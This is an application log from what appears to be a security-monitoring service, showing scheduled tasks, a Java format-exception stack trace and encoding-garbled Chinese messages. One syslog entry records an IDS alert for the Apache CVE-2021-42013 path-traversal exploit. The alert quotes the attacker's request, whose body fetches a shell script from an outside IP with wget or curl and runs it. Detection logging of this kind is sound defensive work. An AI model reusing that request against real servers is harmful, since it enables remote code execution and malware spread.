2026-05-19 13:00:00.230 [scheduling-10] INFO c.c.service.DeviceStatsUpdateService - 豸ͳƸɣ1ʱ153ms
2026-05-19 13:00:00.230 [scheduling-10] INFO c.c.service.DeviceStatsUpdateService - ʼִɼ̽ʱ£ʱ: 2026-05-19T13:00:00.230
2026-05-19 13:00:00.230 [scheduling-1] INFO c.c.service.AlarmHealthCheckService - alarm_20260519 : 4Сʱ=0, ״̬=
2026-05-19 13:00:00.230 [scheduling-10] INFO c.c.s.DeviceCollectTaskUpdateService - ʼɼʱǰʱ: 2026-05-19T13:00:00.230
2026-05-19 13:00:00.235 [scheduling-1] ERROR c.c.s.AlarmHealthCheckScheduler - ִ쳣: d != java.lang.String
java.util.IllegalFormatConversionException: d != java.lang.String
at java.util.Formatter$FormatSpecifier.failConversion(Formatter.java:4302)
at java.util.Formatter$FormatSpecifier.printInteger(Formatter.java:2793)
at java.util.Formatter$FormatSpecifier.print(Formatter.java:2747)
at java.util.Formatter.format(Formatter.java:2520)
at java.util.Formatter.format(Formatter.java:2455)
at java.lang.String.format(String.java:2940)
at com.common.service.AlarmHealthCheckService.generateAlarmNotification(AlarmHealthCheckService.java:119)
at com.common.service.AlarmHealthCheckService.performHealthCheck(AlarmHealthCheckService.java:48)
at com.common.schedule.AlarmHealthCheckScheduler.scheduledHealthCheck(AlarmHealthCheckScheduler.java:32)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.springframework.scheduling.support.ScheduledMethodRunnable.run(ScheduledMethodRunnable.java:84)
at org.springframework.scheduling.support.DelegatingErrorHandlingRunnable.run(DelegatingErrorHandlingRunnable.java:54)
at org.springframework.scheduling.concurrent.ReschedulingRunnable.run(ReschedulingRunnable.java:95)
at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201(ScheduledThreadPoolExecutor.java:180)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:293)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)
2026-05-19 13:00:00.235 [scheduling-1] INFO c.c.s.AlarmHealthCheckScheduler - ========== ==========
2026-05-19 13:00:00.377 [scheduling-6] INFO c.c.s.ProbeStatusCheckScheduler - ̽ͳ: =1, =1, =0
2026-05-19 13:00:00.377 [scheduling-6] INFO c.c.s.ProbeStatusCheckScheduler - ========== ̽״̬ ==========
2026-05-19 13:00:00.471 [log-processor-8] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:55:00.252
2026-05-19 13:00:00.513 [scheduling-5] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:55:00.252
2026-05-19 13:00:00.638 [scheduling-10] INFO c.c.s.DeviceCollectTaskUpdateService - ɣܼ: 48Ѹ: 1
2026-05-19 13:00:00.638 [scheduling-10] INFO c.c.service.DeviceStatsUpdateService - ɼ̽ʱɣʱ: 408ms
2026-05-19 13:00:24.465 [http-nio-8089-exec-4] INFO com.controllers.SyslogPushController - յsyslog: SyslogRequest{ip='192.168.0.124', port=514, logContent='<128>May 02 20:05:46 2026 {"sendHostAddress":"192.168.101.251", "deviceAssetSubTypeId":"59", "machineCode":"000d484ba79b", "interfaceName":"eth2", "transProtocol":"TCP", "appProtocol":"http", "logSessionId":"2605022005460345601", "srcAddress":"192.168.101.1", "srcPort":"41614", "srcMacAddress":"90-F1-B0-FA-CD-2A", "destMacAddress":"FA-16-C0-A8-65-AD", "destAddress":"192.168.101.173", "destPort":"80", "vlanId":"0", "vxlanId":"0", "productVendorName":"", "deviceAddress":"192.168.101.251", "eventCount":"1", "deviceSendProductName":"APTսԤ", "deviceProductType":"ּϵͳ", "deviceName":"devicename", "deviceId":"0", "deviceVersion":"2.0.79.89080.260305_ruletag_2.0.31216.260424.1", "srcGeoCountry":"й", "srcGeoRegion":"", "srcGeoCity":"", "srcGeoLongitude":"114.156924", "srcGeoLatitude":"22.340151", "destGeoCountry":"й", "destGeoRegion":"", "destGeoCity":"", "destGeoLongitude":"114.156924", "destGeoLatitude":"22.340151", "direction":"11", "attackerAddress":"srcAddress", "victimAddress":"destAddress", "attackDirection":"1", "attacker":["192.168.101.1"], "victim":["192.168.101.173"], "srcSecurityZone":"outer", "destSecurityZone":"outer", "logType":"alert", "dataType":"ids", "dataSubType":"attackAlert", "deviceCat":"/IDS/Network", "catObject":"/Host/Application/Service", "catBehavior":"/Access", "catOutcome":"FAIL", "catTechnique":"/Exploit/DirectoryTraversal", "severity":"5", "catSignificance":"/Informational/Warning", "eventId":"2605022005460000360199631657902", "startTime":"2026-05-02 20:05:46", "endTime":"2026-05-02 20:05:46", "deviceReceiptTime":"2026-05-02 20:05:46", "collectorReceiptTime":"2026-05-02 20:05:46", "ruleId":"93008265", "ruleName":"Apache HTTP Server 2.4.49 ·Խ© (CVE-2021-42013)", "alarmType":"WEB->·", "ruleType":"/WebAttack/DirTraversal", "requestMethod":"POST", "requestUrlQuery":"/cgi-bin/../../../../../../../bin/sh", "requestUrl":"/cgi-bin/../../../../../../../bin/sh", "requestHeader":"POST /cgi-bin/../../../../../../../bin/sh HTTP/1.1<br/>Host: 43.255.55.45:80<br/>Upgrade-Insecure-Requests: 1<br/>Accept: */*<br/>User-Agent: libredtail-http<br/>Connection: keep-alive<br/>Content-Type: text/plain<br/>Content-Length: 123<br/>", "requestBody":"(wget --no-check-certificate -qO- https://125.135.169.171/sh || curl -sk https://125.135.169.171/sh) | sh -s apache.selfrep", "responseHeader":"HTTP/1.1 400 Bad Request<br/>Content-Type: text/html; charset=us-ascii<br/>Server: Microsoft-HTTPAPI/2.0<br/>Date: Sat, 02 May 2026 12:05:45 GMT<br/>Connection: close<br/>Content-Length: 324<br/>", "responseMsg":"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"><br/><HTML><HEAD><TITLE>Bad Request</TITLE><br/><META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD><br/><BODY><h2>Bad Request - Invalid URL</h2><br/><hr><p>HTTP Error 400. The request URL is invalid.</p><br/></BODY></HTML><br/>", "responseCode":"400", "destHostName":"43.255.55.45:80", "name":"Apache HTTP Server 2.4.49 ·Խ© (CVE-2021-42013)", "cve":"CVE-2021-42013", "txId":"0", "confidence":"High", "httpVersion":"HTTP/1.1", "accessAgent":"libredtail-http", "attackStage":"1", "attackStatus":"3", "pcapRecord":"true", "tacticId":"TA0001", "techniquesId":"T1190", "isAPT":"false", "killChain":"KC_Exploitation", "message":"Apache HTTP Server 2.4.49 ·Խ© (CVE-2021-42013). Դ192.168.101.1/41614, Ŀģ192.168.101.173/80"}', protocol='TCP', facility='USER', severity='INFO'}
2026-05-19 13:00:24.465 [http-nio-8089-exec-4] INFO com.common.service.SyslogService - ʼsyslogϢ: IP=192.168.0.124, Port=514
2026-05-19 13:00:24.466 [http-nio-8089-exec-4] INFO com.common.service.SyslogService - TCP SyslogϢͳɹ: 192.168.0.124:514
2026-05-19 13:00:24.467 [http-nio-8089-exec-4] INFO com.controllers.SyslogPushController - SyslogϢͳɹ: IP=192.168.0.124, Port=514
2026-05-19 13:01:00.001 [scheduling-9] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 13:01:00.001 [scheduling-8] INFO c.c.s.NormalizeRuleHitTimeService - ʼִзʱʱ䣺2026-05-19T13:01:00.001
2026-05-19 13:01:00.001 [log-processor-9] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 13:01:00.228 [scheduling-9] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 13:01:00.230 [log-processor-9] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 13:01:00.458 [log-processor-9] INFO c.c.service.AccessLogAlertService - ȡ 1 µ־ݣʱ䷶Χ: 2026-05-19T12:55:00.252 2026-05-19T13:01:00.230
2026-05-19 13:01:00.458 [log-processor-9] INFO c.c.service.AccessLogAlertService - ʼ㷨: 㷨3 (ID: 2004083121877696514)
2026-05-19 13:01:00.502 [log-processor-9] INFO c.c.service.AccessLogAlertService - 㷨3 δ
2026-05-19 13:01:00.502 [log-processor-9] INFO c.c.service.AccessLogAlertService - ־ɣ´ν 2026-05-19T13:01:00.230 ʼ
2026-05-19 13:01:00.519 [scheduling-9] INFO c.c.service.AccessLogAlertService - ȡ 1 µ־ݣʱ䷶Χ: 2026-05-19T13:01:00.230 2026-05-19T13:01:00.228
2026-05-19 13:01:00.519 [scheduling-9] INFO c.c.service.AccessLogAlertService - ʼ㷨: 㷨3 (ID: 2004083121877696514)
2026-05-19 13:01:00.563 [scheduling-9] INFO c.c.service.AccessLogAlertService - 㷨3 δ
2026-05-19 13:01:00.563 [scheduling-9] INFO c.c.service.AccessLogAlertService - ־ɣ´ν 2026-05-19T13:01:00.228 ʼ
2026-05-19 13:01:00.671 [scheduling-8] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_data ͳƵ 1 м¼
2026-05-19 13:01:00.671 [scheduling-8] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_alarm ͳƵ 0 м¼
2026-05-19 13:01:00.671 [scheduling-8] INFO c.c.s.NormalizeRuleHitTimeService - ϲҪµĹ1
2026-05-19 13:01:00.825 [scheduling-8] INFO c.c.s.NormalizeRuleHitTimeService - ǰ״̬Ĺ174
2026-05-19 13:01:00.825 [scheduling-8] INFO c.c.s.NormalizeRuleHitTimeService - ʼ£1741
2026-05-19 13:01:00.977 [scheduling-8] INFO c.c.s.NormalizeRuleHitTimeService - ʱɣ¹1ʱ976ms
2026-05-19 13:02:00.008 [scheduling-7] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 13:02:00.008 [log-processor-10] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 13:02:00.231 [log-processor-10] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 13:02:00.233 [scheduling-7] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 13:02:00.494 [scheduling-7] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T13:01:00.228
2026-05-19 13:02:00.527 [log-processor-10] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T13:01:00.228
2026-05-19 13:03:00.003 [scheduling-6] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 13:03:00.003 [log-processor-1] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 13:03:00.229 [scheduling-6] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 13:03:00.229 [log-processor-1] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 13:03:00.488 [scheduling-6] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T13:01:00.228
2026-05-19 13:03:00.522 [log-processor-1] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T13:01:00.228
2026-05-19 13:03:10.295 [scheduling-5] INFO c.c.s.RealtimeAnalysisScheduler - ִй: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, nextTime=2026-05-19T13:03, now=2026-05-19T13:03:10.061
2026-05-19 13:03:10.295 [scheduling-5] INFO c.c.s.impl.AnalysisRuleServiceImpl - ִʵʱ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765
2026-05-19 13:03:10.754 [scheduling-5] INFO c.c.s.impl.RealtimeAnalysisEngine - ڲѯΧ: ڴС=10mѯʱ䷶Χ=[2026-05-19 12:53:00, 2026-05-19 13:03:00]
2026-05-19 13:03:10.754 [scheduling-5] INFO c.c.s.impl.RealtimeAnalysisEngine - ʼִʵʱ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, batchNo=20260519130310448, windowType=tumble, dataStartTime=2026-05-19 12:53:00, dataEndTime=2026-05-19 13:03:00
2026-05-19 13:03:11.953 [scheduling-5] INFO c.c.s.impl.RealtimeAnalysisEngine - ɵSQL: SELECT src_ip AS attack_ip,
dest_ip AS victim_ip,
origin_event_name AS alarm_name,
ARRAY_AGG(DISTINCT src_port) AS attack_port,
ARRAY_AGG(DISTINCT dest_port) AS victim_port,
MAX(event_level) AS alarm_level,
MODE() WITHIN GROUP (ORDER BY dest_domain) AS dns_info,
MODE() WITHIN GROUP (ORDER BY origin_event_type) AS alarm_type,
COUNT(dest_ip) AS log_count,
MAX(attack_result) AS attack_result,
ARRAY_AGG(DISTINCT http_req_header) AS http_req_header,
ARRAY_AGG(DISTINCT http_req_body) AS http_req_body,
ARRAY_AGG(DISTINCT http_resp_header) AS http_resp_header,
ARRAY_AGG(DISTINCT http_resp_body) AS http_resp_body,
ARRAY_AGG(DISTINCT http_url) AS victim_web_url,
ARRAY_AGG(DISTINCT id) AS origin_log_ids,
MIN(log_time) AS log_start_at,
MAX(log_time) AS log_end_at,
ARRAY_AGG(DISTINCT device_id) AS device_id,
ARRAY_AGG(DISTINCT payload) AS payload,
TUMBLE(log_time, INTERVAL '10 MINUTE') AS window_time
FROM syslog_normal_alarm AS t
WHERE log_time >= '2026-05-19 12:53:00' AND log_time < '2026-05-19 13:03:00' AND src_ip != '127.0.0.1' AND event_level >= 1
GROUP BY src_ip, dest_ip, origin_event_name, TUMBLE(log_time, INTERVAL '10 MINUTE')
2026-05-19 13:03:12.414 [scheduling-5] INFO c.c.s.impl.RealtimeAnalysisEngine - ִгɹ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, processedCount=0, alarmCount=0
2026-05-19 13:03:12.714 [scheduling-5] INFO c.c.s.i.RuleExecutionTimeServiceImpl - ¹´ִʱ䣬ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, windowType=tumble, nextExecuteTime=2026-05-19 13:13:00
2026-05-19 13:03:12.714 [scheduling-5] INFO c.c.s.RealtimeAnalysisScheduler - εִй: 1, : 0
2026-05-19 13:04:00.011 [scheduling-10] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 13:04:00.011 [log-processor-2] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 13:04:00.234 [log-processor-2] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 13:04:00.237 [scheduling-10] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 13:04:00.573 [scheduling-10] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T13:01:00.228
2026-05-19 13:04:00.573 [log-processor-2] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T13:01:00.228
Reference in New Issue View Git Blame Copy Permalink